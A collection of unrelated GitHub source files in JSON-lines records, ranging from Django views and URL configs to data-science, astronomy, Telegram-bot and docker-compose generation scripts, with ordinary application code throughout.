self.container.calc_intent(utt)\n","repo_name":"injones/mycroft_ros","sub_path":"scripts/mycroft/skills/padatious_service.py","file_name":"padatious_service.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"34084093101","text":"from django.conf.urls.defaults import patterns, url\nfrom django.template.defaultfilters import slugify\n\nfrom rc.resources.views import ResourceItemListView\nfrom rc.resources.apps.education import models\n\ndef academic_centers_url_name(center_type_code):\n academic_center_types = dict(models.AcademicCenterType.CENTER_TYPES)\n return 'academic-centers-' + 
slugify(academic_center_types[center_type_code])\n\nurlpatterns = patterns(\n '',\n url(r'^alumni-sustainability-networks$',\n ResourceItemListView.as_view(\n model=models.SustainabilityNetwork,\n queryset=models.SustainabilityNetwork.objects.published()),\n kwargs={'member_only': True},\n name='sustainability-networks'),\n\n url(r'^study-abroad-programs-sustainability$',\n ResourceItemListView.as_view(\n model=models.StudyAbroadProgram,\n queryset=models.StudyAbroadProgram.objects.published()),\n name='study-abroad-programs',\n kwargs={'program_types': dict(models.StudyAbroadProgram.PROGRAM_TYPES),\n 'member_only': True}),\n\n url(r'^campus-and-campus-community-gardens$',\n ResourceItemListView.as_view(\n model=models.CommunityGarden,\n queryset=models.CommunityGarden.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='community-gardens',\n kwargs={'title': 'Campus and Campus-Community Gardens',\n 'member_only': True}),\n\n url(r'^campus-supported-agriculture-and-farms$',\n ResourceItemListView.as_view(\n model=models.CampusAgriculture,\n queryset=models.CampusAgriculture.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='campus-agricultures',\n kwargs={'title': 'Campus Supported Agriculture and Farms',\n 'member_only': True}),\n\n url(r'^campus-sustainable-living-guides$',\n ResourceItemListView.as_view(\n model=models.LivingGuide,\n queryset=models.LivingGuide.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='living-guides',\n kwargs={'member_only': True}),\n\n url(r'^campus-sustainability-mapstours$',\n ResourceItemListView.as_view(\n model=models.SustainabilityMap,\n queryset=models.SustainabilityMap.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='sustainability-maps',\n kwargs={'member_only': True, 'title': 'Campus Sustainability Maps and Tours'}),\n\n url(r'^surveys-sustainability-awareness-attitudes-and-values$',\n ResourceItemListView.as_view(\n model=models.SurveyOfAwareness,\n queryset=models.SurveyOfAwareness.objects.published().order_by(\n 'organization__name')),\n name='surveys-of-awareness',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-course-inventories$',\n ResourceItemListView.as_view(\n model=models.SustainabilityCourseInventory,\n queryset=models.SustainabilityCourseInventory.objects.published().order_by(\n 'organization__name')),\n name='sustainability-course-inventories',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-faculty-development-workshops$',\n ResourceItemListView.as_view(\n model=models.FacultyWorkshop,\n queryset=models.FacultyWorkshop.objects.published().order_by(\n 'organization__name')),\n name='faculty-workshops',\n kwargs={'member_only': True,\n 'title': 'Campus-led Faculty Development Workshops on Sustainability'}),\n\n url(r'^sustainability-research-inventories$',\n ResourceItemListView.as_view(\n model=models.ResearchInventory,\n queryset=models.ResearchInventory.objects.published().order_by(\n 'organization__name')),\n name='research-inventories',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-related-syllabi-databases$',\n ResourceItemListView.as_view(\n model=models.SustainabilitySyllabus,\n queryset=models.SustainabilitySyllabus.objects.published().order_by(\n 'organization__name')),\n name='sustainability-syllabi',\n kwargs={'title':'Sustainability-Related Syllabi Databases',\n 'member_only': True}),\n\n 
url('^academic-centers-and-research-initiatives-sustainable-'\n 'agriculture$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='AG').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'agriculture_list.html'),\n name=academic_centers_url_name('AG'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Agriculture & Sustainability\",\n 'member_only': True,\n }),\n\n url('^sustainable-design-academic-centers$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='AR').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'architecture_list.html'),\n name=academic_centers_url_name('AR'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Architecture & Sustainability\",\n 'member_only': True,\n }),\n\n url('^business-school-academic-centers-and-'\n 'research-initiatives-sustainability$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='BS').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'business_list.html'),\n name=academic_centers_url_name('BS'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Business & Sustainability\",\n 'member_only': True,\n }),\n\n url('^research-centers-sustainable-development$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='DS').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'developmentstudies_list.html'),\n name=academic_centers_url_name('DS'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Development Studies & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-ecological-economics$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='EC').order_by('organization__country',\n 'organization__name'),\n template_name='education/academiccenters/'\n 'economics_list.html'),\n name=academic_centers_url_name('EC'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Economics & Sustainability\",\n 'member_only': True,\n }),\n\n url('^'\n 'academic-centers-sustainability-and-environmental-education$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='ED').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'education_list.html'),\n name=academic_centers_url_name('ED'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Education & Sustainability\",\n 'member_only': True,\n }),\n\n url('^sustainable-engineering-academic-centers$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='EN').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'engineering_list.html'),\n name=academic_centers_url_name('EN'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Engineering & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-focused-environmental-law$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n 
type__type='LW').order_by('organization__country',\n 'organization__name'),\n template_name='education/academiccenters/law_list.html'),\n name=academic_centers_url_name('LW'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Law & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-and-research-inititatives-urban-studies$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='US').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'urbanstudies_list.html'),\n name=academic_centers_url_name('US'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Urban Studies & Sustainability\",\n 'member_only': True,\n }),\n\n url('^courses-campus-sustainability$',\n ResourceItemListView.as_view(\n model=models.CampusSustainabilityCourse,\n queryset=models.CampusSustainabilityCourse.objects.published().order_by(\n 'organization__name', 'title'),\n template_name='education/academiccenters/'\n 'campussustainabilitycourse_list.html'),\n name='campus-sustainability-courses',\n kwargs={\n 'title': \"Courses Focusing on Campus Sustainability\",\n 'member_only': True,\n }),\n\n )\n","repo_name":"AASHE/django-irc","sub_path":"rc/resources/apps/education/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38585754300","text":"#!/usr/bin/env python3\n\n# SPDX-License-Identifier: CC0-1.0\n#\n# SPDX-FileContributor: Antonio Niño Díaz, 2023\n\nimport hashlib\nimport os\nimport random\nimport shutil\n\nNUM_FOLDERS = 20\nNUM_FILES = 100\n\ndef md5hash(_bytes):\n m = hashlib.md5()\n m.update(_bytes)\n return m.hexdigest()\n\ndef gen_file(directory_path, size):\n _bytes = bytearray(os.urandom(size))\n file_name = md5hash(_bytes)\n full_path = os.path.join(directory_path, file_name)\n\n with open(full_path, \"wb\") as f:\n f.write(_bytes)\n\ndef gen_tree(base_path):\n folder_paths = [base_path]\n\n # Generate all directories. 
They are created in any of the directories that\n # have already been generated.\n for num in range(NUM_FOLDERS):\n name = f\"dir{num}\"\n\n num_dirs = len(folder_paths)\n destination_dir = folder_paths[random.randint(0, num_dirs - 1)]\n\n new_folder_path = os.path.join(destination_dir, name)\n folder_paths.append(new_folder_path)\n os.mkdir(new_folder_path)\n\n for num in range(NUM_FILES):\n destination_dir = folder_paths[random.randint(0, len(folder_paths) - 1)] # include every folder, not just the first NUM_FOLDERS\n size = random.randint(1, 256) * 1024\n gen_file(destination_dir, size)\n\nif __name__ == \"__main__\":\n base = \"nitrofat\"\n\n if os.path.isdir(base):\n shutil.rmtree(base)\n os.mkdir(base)\n gen_tree(base)\n","repo_name":"blocksds/sdk","sub_path":"tests/filesystem/stress_test/gen_filesystem.py","file_name":"gen_filesystem.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"6"}
{"seq_id":"25322071730","text":"import csv\n\n# function to sort a CSV file by one column\ndef sort_csv(input_file, output_file, sort_column, delimiter=\",\"):\n with open(input_file, \"r\", newline='') as infile, open(output_file, 'w', newline='') as outfile:\n reader = csv.reader(infile, delimiter=delimiter)\n header = next(reader)\n sorted_data = sorted(reader, key=lambda row: row[sort_column])\n\n\n writer = csv.writer(outfile, delimiter=delimiter)\n writer.writerow(header)\n writer.writerows(sorted_data) # writerows: one CSV row per data row\n\n\nif __name__==\"__main__\":\n input_file = 'input.csv'\n output_file = 'output.csv'\n sort_column = 0\n\n sort_csv(input_file, output_file, sort_column)\n print(f\"File '{input_file}' has been sorted by column {sort_column} and saved as '{output_file}'.\")\n","repo_name":"jitendrarmore/pythonscripts","sub_path":"CSVfileSort.py","file_name":"CSVfileSort.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"8588270296","text":"import numpy as np\nimport lightkurve as lk\nfrom astropy.timeseries import LombScargle\n\ndef get_lc_data(id,instrument,cadence):\n \"\"\"Gets light curve data using Lightkurve.\n\n Returns:\n np.ndarray: Time data.\n np.ndarray: Flux data.\n \"\"\"\n if type(id) != str:\n id = str(id)\n\n if instrument == 'tess':\n try:\n lc_files = lk.search_lightcurve('TIC'+id, cadence='short').download_all()\n print('cadence type: short')\n except:\n lc_files = lk.search_lightcurve('TIC'+id, cadence='long').download_all()\n print('cadence type: long')\n\n elif instrument == 'kepler':\n lc_files = lk.search_lightcurve('KIC'+id, cadence=cadence).download_all()\n print('cadence type: {}'.format(cadence))\n\n else:\n raise TypeError('Only Kepler and TESS are supported instruments')\n \n time, flux = np.array([]), np.array([])\n for q,lc in enumerate(lc_files):\n\n time_table = lc['time']\n this_time = []\n for val in range(0,len(time_table)):\n time_value = time_table[val].value\n this_time.append(time_value)\n\n this_flux = lc['pdcsap_flux']\n good = np.isfinite(this_time)\n \n median_flux = np.nanmedian(this_flux)\n this_time = np.array(this_time)[good] # keep time and flux the same length\n this_flux = this_flux[good] / median_flux\n this_q = np.zeros_like(this_time) + q\n \n bad = np.logical_not(np.isfinite(this_flux))\n this_flux[bad] = 1.\n time = np.concatenate((time,this_time))\n flux = np.array(np.concatenate((flux,this_flux)))\n\n ###mask hack###\n t0 = 0\n per = 58\n for i in np.linspace(0,100):\n event_time = t0 + (i*per)\n mask = (time > (event_time - .5)) & (time < (event_time + 
.5))\n time = time[~mask]\n flux = flux[~mask]\n\n flux=flux-1.\n\n return time,flux\n\n\ndef freq_finder(time,flux,find_mode=False, qmin=0.,qmax=np.Inf):\n \"\"\"Finds frequency based off of LombScargle peaks. Fits parabola.\n\n Args:\n time (np.ndarray): Time data.\n flux (np.ndarray): Flux data.\n qmin (float): Minimum for frequency choice.\n qmax (float): Maximum for frequency choice.\n\n Returns:\n float: Frequency estimate that is improved upon in optimization step.\n np.ndarray: Frequency (x-) component of LombScargle.\n np.ndarray: Power (y-) component of LombScargle.\n \"\"\" \n q,y = LombScargle(time,flux).autopower()\n # f0_guess = q[np.argmax(y * (q > qmin) * (q < qmax))]\n #do per peak:\n modes = []\n #to get ys, get highest value and one after and one preceding?\n # ys = \n # x1 = \n # delta = \n f0_guess = refine_peak()\n print(\"Mode guess:\",f0_guess)\n\n return f0_guess\n\ndef refine_peak(y,x1,delta):\n \"\"\"\n Refines peak that corresponds to orbital period of companion.\n\n Args:\n y(np.ndarray): Array of three y-values corresponding to the y before, of, and after peak y.\n x1(float): X-value of y peak value (or y[1]).\n delta(flloat): X-axis difference between y[0] and y[1], and y[1] and y[2].\n\n Returns:\n float: Refined x-value of peak, ie refined orbital period.\n \"\"\"\n assert y.shape == (3,1)\n\n b = .5*(y[2]-y[0])/delta\n a = (-2*y[1]+y[0]+y[2])/(delta**2)\n\n assert a<0\n assert -delta<(-b/a) List[OriginVisitInfo]:\n \"\"\"Function that returns the list of visits for a swh origin.\n That list is put in cache in order to speedup the navigation\n in the swh web browse ui.\n\n The returned visits are sorted according to their date in\n ascending order.\n\n Args:\n origin_info: dict describing the origin to fetch visits from\n lookup_similar_urls: if :const:`True`, lookup origin with and\n without trailing slash in its URL\n\n Returns:\n A list of dict describing the origin visits\n\n Raises:\n swh.web.utils.exc.NotFoundExc: if the origin is not found\n \"\"\"\n\n from swh.web.utils import archive\n\n origin_url = archive.lookup_origin(\n origin_info, lookup_similar_urls=lookup_similar_urls\n )[\"url\"]\n\n cache_entry_id = \"origin_visits_%s\" % origin_url\n cache_entry = cache.get(cache_entry_id)\n\n last_visit = 0\n origin_visits = []\n new_visits = []\n per_page = archive.MAX_LIMIT\n if cache_entry:\n origin_visits = cache_entry\n last_visit = cache_entry[-1][\"visit\"]\n new_visits = list(\n archive.lookup_origin_visits(\n origin_url, last_visit=last_visit, per_page=per_page\n )\n )\n last_visit += len(new_visits)\n if not new_visits:\n last_snp = archive.lookup_latest_origin_snapshot(origin_url)\n if not last_snp or last_snp[\"id\"] == cache_entry[-1][\"snapshot\"]:\n return cache_entry\n\n # get new visits that we did not retrieve yet\n while 1:\n visits = list(\n archive.lookup_origin_visits(\n origin_url, last_visit=last_visit, per_page=per_page\n )\n )\n new_visits += visits\n if len(visits) < per_page:\n break\n last_visit += per_page\n\n def _visit_sort_key(visit):\n ts = parse_iso8601_date_to_utc(visit[\"date\"]).timestamp()\n return ts + (float(visit[\"visit\"]) / 10e3)\n\n # cache entry is already sorted with oldest visits\n origin_visits += sorted(new_visits, key=lambda v: _visit_sort_key(v))\n\n cache.set(cache_entry_id, origin_visits)\n\n return origin_visits\n\n\ndef get_origin_visit(\n origin_info: OriginInfo,\n visit_ts: Optional[str] = None,\n visit_id: Optional[int] = None,\n snapshot_id: Optional[str] = None,\n) -> OriginVisitInfo:\n 
\"\"\"Function that returns information about a visit for a given origin.\n\n If a timestamp is provided, the closest visit from that\n timestamp is returned.\n\n If a snapshot identifier is provided, the first visit with that snapshot\n is returned.\n\n If no search hints are provided, return the most recent full visit with\n a valid snapshot or the most recent partial visit with a valid snapshot\n otherwise.\n\n Args:\n origin_info: a dict filled with origin information\n visit_ts: an ISO 8601 datetime string to parse\n snapshot_id: a snapshot identifier\n\n Returns:\n A dict containing the visit info.\n\n Raises:\n swh.web.utils.exc.NotFoundExc: if no visit can be found\n \"\"\"\n # returns the latest full visit with a valid snapshot\n visit = archive.lookup_origin_visit_latest(\n origin_info[\"url\"], allowed_statuses=[\"full\"], require_snapshot=True\n )\n if not visit:\n # or the latest partial visit with a valid snapshot otherwise\n visit = archive.lookup_origin_visit_latest(\n origin_info[\"url\"], allowed_statuses=[\"partial\"], require_snapshot=True\n )\n\n if not visit_ts and not visit_id and not snapshot_id:\n if visit:\n return visit\n else:\n raise NotFoundExc(\n f\"No valid visit for origin with url {origin_info['url']} found!\"\n )\n\n # no need to fetch all visits list and search in it if the latest\n # visit matches some criteria\n if visit and (visit[\"snapshot\"] == snapshot_id or visit[\"visit\"] == visit_id):\n return visit\n\n if visit_id:\n return archive.lookup_origin_visit(origin_info[\"url\"], visit_id)\n\n if visit_ts:\n visit = archive.origin_visit_find_by_date(\n origin_info[\"url\"],\n parse_iso8601_date_to_utc(visit_ts),\n greater_or_equal=False,\n )\n if visit is not None:\n return visit\n else:\n raise NotFoundExc(\n (\n \"Visit with timestamp %s for origin with \"\n \"url %s not found!\" % (visit_ts, origin_info[\"url\"])\n )\n )\n\n visits = get_origin_visits(origin_info)\n\n if not visits:\n raise NotFoundExc(\n f\"No visits associated to origin with url {origin_info['url']}!\"\n )\n\n if snapshot_id:\n visits = [v for v in visits if v[\"snapshot\"] == snapshot_id]\n if len(visits) == 0:\n raise NotFoundExc(\n (\n \"Visit for snapshot with id %s for origin with\"\n \" url %s not found!\" % (snapshot_id, origin_info[\"url\"])\n )\n )\n return visits[0]\n\n return visits[-1]\n","repo_name":"SoftwareHeritage/swh-web","sub_path":"swh/web/utils/origin_visits.py","file_name":"origin_visits.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"41765912537","text":"from django.shortcuts import render, get_object_or_404, reverse\nfrom django.views import generic, View\nfrom django.http import HttpResponseRedirect\nfrom .models import Post\nfrom .forms import CommmentForm\n\n\n# create view code\nclass PostList(generic.ListView):\n # setting model to post\n model = Post\n # set this to 1 for posted comments and order in descending by created on\n queryset = Post.objects.filter(status=1).order_by('-created_on')\n template_name = 'index.html'\n paginate_by = 6\n\nclass PostDetail(View):\n\n def get(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_on')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked=True\n\n\n return render(\n request,\n \"post_detail.html\",\n {\n \"post\" : post,\n 
'comments': comments,\n                'commented': False,\n                'liked': liked,\n                'comment_form': CommmentForm(),\n            },\n        )\n\n    def post(self, request, slug, *args, **kwargs):\n        queryset = Post.objects.filter(status=1)\n        post = get_object_or_404(queryset, slug=slug)\n        comments = post.comments.filter(approved=True).order_by('created_on')\n        liked = False\n        if post.likes.filter(id=self.request.user.id).exists():\n            liked=True\n\n\n        comment_form = CommmentForm(data=request.POST)\n\n        if comment_form.is_valid():\n            comment_form.instance.email = request.user.email\n            comment_form.instance.name = request.user.username\n            commment = comment_form.save(commit=False)\n            commment.post = post\n            commment.save()\n\n        return render(\n            request,\n            \"post_detail.html\",\n            {\n                \"post\" : post,\n                'comments': comments,\n                'commented': True,\n                'liked': liked,\n                'comment_form': CommmentForm(),\n            },\n        )\n\n\nclass PostLike(View):\n\n    def post(self, request, slug, *args, **kwargs):\n        post = get_object_or_404(Post, slug=slug)\n\n        if post.likes.filter(id=request.user.id).exists():\n            post.likes.remove(request.user)\n        else:\n            post.likes.add(request.user)\n\n        return HttpResponseRedirect(reverse('post_detail', args=[slug]))","repo_name":"Colm1711/DjangoBlog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"24475378088","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove\n\n# KeyboardButton - the button itself; pressing it also sends the command\n\nb1 = KeyboardButton('/Режим_работы')\nb2 = KeyboardButton('/Расположение')\nb3 = KeyboardButton('/Меню')\n# b4 = KeyboardButton('/Поделиться номером', request_contact=True)\n# b5 = KeyboardButton('/Отправить где я', request_location=True)\n\n# ReplyKeyboardMarkup - replaces the regular keyboard with the one I create\nkb_client = ReplyKeyboardMarkup(resize_keyboard=True) # resize_keyboard=True sizes the buttons to fit their labels\n# one_time_keyboard=True makes the keyboard hide after a button is pressed\nkb_client.add(b1).add(b2).add(b3) #.row(b4, b5)\n\n# the add() method adds a button on a new row\n# the insert() method adds a button to the current row if there is room\n# the row() method puts all the given buttons on one row\n# these methods can be combined however is convenient","repo_name":"RinatStar420/telegramm_pizza_bot","sub_path":"keyboards/client_kb.py","file_name":"client_kb.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"36828638233","text":"import yaml\n\nfrom docker_compose_utils import *\n\n\nclass GenerationConfig(object):\n    def __init__(self, docker_repository, tags, api_version, subnet):\n        self.docker_repository = docker_repository\n        self.tags = tags\n        self.api_version = api_version\n        self.subnet = Subnet(subnet)\n        self.gateway = self.subnet.default_gateway()\n\n    def tag(self, repository):\n        return self.tags[repository]\n\n\nclass VolumesGeneration(object):\n    @staticmethod\n    def generate(volumes):\n        return dict((v, {}) for v in volumes)\n\n\nclass NetworksGeneration(object):\n    @staticmethod\n    def generate(generation_config):\n        return {\n            'default': {\n                'ipam': {\n                    'driver': 'default',\n                    'config': [\n                        {\n                            'subnet': generation_config.subnet.as_string(),\n                            'gateway': generation_config.gateway\n                        }\n                    ]\n                }\n            }\n        }\n\n\nclass ServiceGeneration(object):\n\n    def __init__(self, service):\n        self.service = 
service\n\n    def generate(self, generation_config):\n        if generation_config.docker_repository != '':\n            repository_prefix = \"{}/\".format(generation_config.docker_repository)\n        else:\n            repository_prefix = ''\n        properties = {\n            'image': '{}seahorse-{}:{}'.format(\n                repository_prefix,\n                self.service.image_name(),\n                generation_config.tag(self.service.repository())),\n            'network_mode': self.service.network_mode or None,\n            'environment': self.service.environment().to_dict() or None,\n            'depends_on': [c.name() for c in self.service.depends_on()] or None,\n            'links': [c.name() for c in self.service.links()] or None,\n            'volumes': self.service.volumes() or None,\n            'ports': [Ports.exposed_on_localhost(pm.exposed, pm.internal)\n                      for pm in self.service.port_mapping()\n                      if self.service.port_mapping().generate],\n            'restart': self.service.restart\n        }\n\n        if self.service.network_mode != 'host':\n            properties['networks'] = {\n                'default': {\n                    'ipv4_address': self.service.internal_ip().host\n                }\n            }\n\n        return self.service.name(), {k: v for (k, v) in properties.iteritems() if v is not None}\n\n\nclass ConfigurationGeneration(object):\n\n    def __init__(self, configuration):\n        self.configuration = configuration\n        self.services = Services()\n\n\n    def generate(self, generation_config):\n        # Each service receives a full list of service instances so that it may use\n        # their properties (like addresses, port numbers, etc)\n        self.service_instances = [s(self.services, generation_config) for s in self.configuration.services]\n        for si in self.service_instances:\n            self.services.add_service(si)\n\n        self.services.Frontend.API_VERSION = generation_config.api_version\n\n        return {\n            'version': '2',\n            'services': dict(ServiceGeneration(s).generate(generation_config) for s in self.service_instances),\n            'volumes': VolumesGeneration.generate(self.configuration.volumes),\n            'networks': NetworksGeneration.generate(generation_config)\n        }\n\n\ndef dump_yaml_to_string(json_obj):\n    class MyDumper(yaml.Dumper):\n        def increase_indent(self, flow=False, indentless=False):\n            return super(MyDumper, self).increase_indent(flow, False)\n\n    return yaml.dump(json_obj, Dumper=MyDumper, default_flow_style=False)\n","repo_name":"deepsense-ai/seahorse","sub_path":"deployment/docker-compose/docker_compose_generation/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"6"} {"seq_id":"11104625486","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 30 16:27:25 2019\n\n@author: WJH\n\"\"\"\n#%%\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport time\nimport numpy as np\nimport pandas as pd\n# plot_confusion_matrix and elapsed are assumed to be helpers in the local utils module\nfrom utils import read_data_from_disk, plot_confusion_matrix, elapsed\nfrom models import model_fasttext, model_cnn\nfrom models import model_rnn_gru1_pool, model_rnn_gru3_atten, model_rnn_pool_atten\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom models import train_pred, find_best_thresh\n\nSEED = 2019  # random seed (value assumed; SEED was not defined in the original script)\n\n#%% Read data\nstart_time = time.time()\ntrain_X,test_X,train_y,features,test_features,embedding_matrix_mean = read_data_from_disk()\ntrain_X, val_X, train_y, val_y = train_test_split(train_X, train_y, \n                                                  test_size=0.1, random_state = SEED, \n                                                  stratify= train_y)\n\n#%% Train and Predict\nmodel = []\noutputs = []\nmodel_name = [\"model_cnn\",\"model_fasttext\",\"model_rnn_gru1_pool\",\"model_rnn_gru3_atten\",\"model_rnn_pool_atten\"]\n\n\nmodel.append(model_cnn(embedding_matrix_mean)) #epoch=1, 5min\nmodel.append(model_fasttext(embedding_matrix_mean)) #epoch=1,3min\nmodel.append(model_rnn_gru1_pool(embedding_matrix_mean)) #epoch=1,4min\nmodel.append(model_rnn_gru3_atten(embedding_matrix_mean)) #epoch=1,8.5min\nmodel.append(model_rnn_pool_atten(embedding_matrix_mean)) #epoch=1,5.5min\n\n\nfor i in range(len(model)):\n    pred_val_y, pred_test_y = train_pred(model[i],train_X, train_y,val_X,val_y,test_X, epochs=2)\n    best_thresh,best_score = find_best_thresh(val_y, pred_val_y,verbose=0)\n    outputs.append([pred_val_y,pred_test_y,best_score,best_thresh,model_name[i]])\n    print(f\"{model_name[i]} finished\")\n    print(\"\")\n    \n#%%\noutputs.sort(key = lambda x : x[2])\nfor output in outputs:\n    print(output[2],output[3],output[4])\n    \nfrom sklearn.linear_model import LinearRegression\nX = np.asarray([outputs[i][0] for i in range(len(outputs))])\nX = X[...,0]\nreg = LinearRegression().fit(X.T, val_y)\nprint(reg.score(X.T, val_y),reg.coef_)\nweights = reg.coef_\nprint(weights)\n\npred_val_y = np.mean([outputs[i][0] * weights[i] for i in range(len(outputs))], axis = 0)\nbest_thresh,best_score = find_best_thresh(val_y, pred_val_y)\npre_test_y = np.mean([outputs[i][1] * weights[i] for i in range(len(outputs))], axis = 0)\ntest_predict = ((pre_test_y)>best_thresh).astype(int)\n\nconfusion_mtx = confusion_matrix(val_y, ((pred_val_y)>best_thresh).astype(int))\nplot_confusion_matrix(confusion_mtx, classes = range(2),normalize=True)\nprint(confusion_mtx)\n\nsub = pd.read_csv('../input/sample_submission.csv')\nsub['prediction'] = test_predict\nsub.to_csv('submission.csv', index=False)\nprint(\"Overall time:\",elapsed(time.time()-start_time))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jianhongwu/Kaggle-Quora-Insincere-Questions-Classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"26555805189","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom apis_core.apis_metainfo.models import Uri\nfrom drf_spectacular.utils import extend_schema, OpenApiParameter, OpenApiTypes\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponseRedirect, QueryDict\nfrom django.urls import reverse\n\n\nclass UriToObjectViewSet(viewsets.ViewSet):\n    \"\"\"\n    This API route provides an endpoint for resolving URIs and forwarding\n    them to the endpoint in the local instance. Pass a `uri` request\n    parameter to resolve the uri.\n    \"\"\"\n\n    @extend_schema(\n        parameters=[\n            OpenApiParameter(\n                \"uri\", OpenApiTypes.URI, OpenApiParameter.QUERY\n            ),  # path variable was overridden\n        ],\n        responses={301: None},\n        description=\"This API route provides an endpoint for resolving URIs and forwarding them to the endpoint in the local instance. 
Pass a `uri` request parameter to resolve the uri.\",\n )\n def list(self, request):\n params = request.query_params.dict()\n uri = params.pop(\"uri\", None)\n if uri:\n u = get_object_or_404(Uri, uri=request.query_params.get(\"uri\"))\n model = u.root_object.self_contenttype.model\n r = reverse(f\"apis:apis_core:{model}-detail\", args=[u.root_object.id])\n if params:\n r += \"?\" + QueryDict.from_keys(params).urlencode()\n return HttpResponseRedirect(r)\n return Response()\n","repo_name":"acdh-oeaw/apis-core-rdf","sub_path":"apis_core/apis_metainfo/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"70400884987","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport itertools\nimport numpy as np\nfrom nohrio.ohrstring import *\nfrom nohrio.dtypes import dt\nfrom nohrio.rpg2 import RPGDir\n\ndef concatenate(lists):\n return sum(lists, [])\n\ndef escaped_split(string, sep):\n \"\"\"\n Split a line using a separator, but ignore separators between quotes\n \"\"\"\n escaped = False\n ret = []\n piece = \"\"\n for char in string:\n if char == ',' and not escaped:\n ret.append(piece)\n piece = \"\"\n elif char == '\"':\n escaped ^= True\n piece += char\n else:\n piece += char\n ret.append(piece)\n return ret\n\ndef escape_string(string):\n \"\"\"\n Escape an 8-bit string suitably for an csv file\n\n Nonprintable characters are escaped in the same format that Custom's textbox\n exporter uses: '\\ddd'\n \"\"\"\n ret = '\"'\n for c in string:\n if ord(c) <= 31 or ord(c) >= 127 or c == '\"':\n if ord(c) == 10:\n ret += '\\\\n'\n else:\n ret += '\\\\%03d' % ord(c)\n else:\n ret += c\n return ret + '\"'\n\ndef unescape_string(string):\n \"\"\"\n Unescape a string from a typical csv file\n \"\"\"\n temp = string.strip()\n if temp.startswith('\"') and temp.endswith('\"'):\n temp = temp[1:-1]\n \n ret = \"\"\n i = 